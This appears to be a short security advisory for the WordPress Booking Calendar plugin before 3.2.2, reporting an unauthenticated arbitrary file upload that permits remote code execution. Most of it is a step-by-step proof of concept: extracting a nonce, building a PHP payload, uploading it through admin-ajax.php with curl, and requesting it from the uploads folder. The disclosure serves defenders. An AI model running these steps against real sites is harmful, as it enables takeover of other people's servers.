Booking Calendar < 3.2.2 - Unauthenticated Arbitrary File Upload

The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE

PoC

1. As an unauthenticated user, navigate to the main WordPress page 2. Extract a valid nonce from the page source (CTRL+F for “var wpdevart =”, field “ajaxNonce”) 3. Prepare a payload for upload: echo ‘’ > /tmp/poc.php 4. Upload the payload with cURL, with the previously extracted nonce: curl -i https://example.com/wp-admin/admin-ajax.php \ -F ‘action=wpdevart_form_ajax’ \ -F ‘wpdevart_id=x’ \ -F ‘wpdevart_nonce=’ \ -F ‘wpdevart_data={“wpdevart-submit”:“X”}’ \ -F ‘wpdevart-submit=1’ \ -F ‘file=@/tmp/poc.php’ 5. Access your payload, it should have been uploaded to “/wp-content/uploads/booking_calendar/” curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php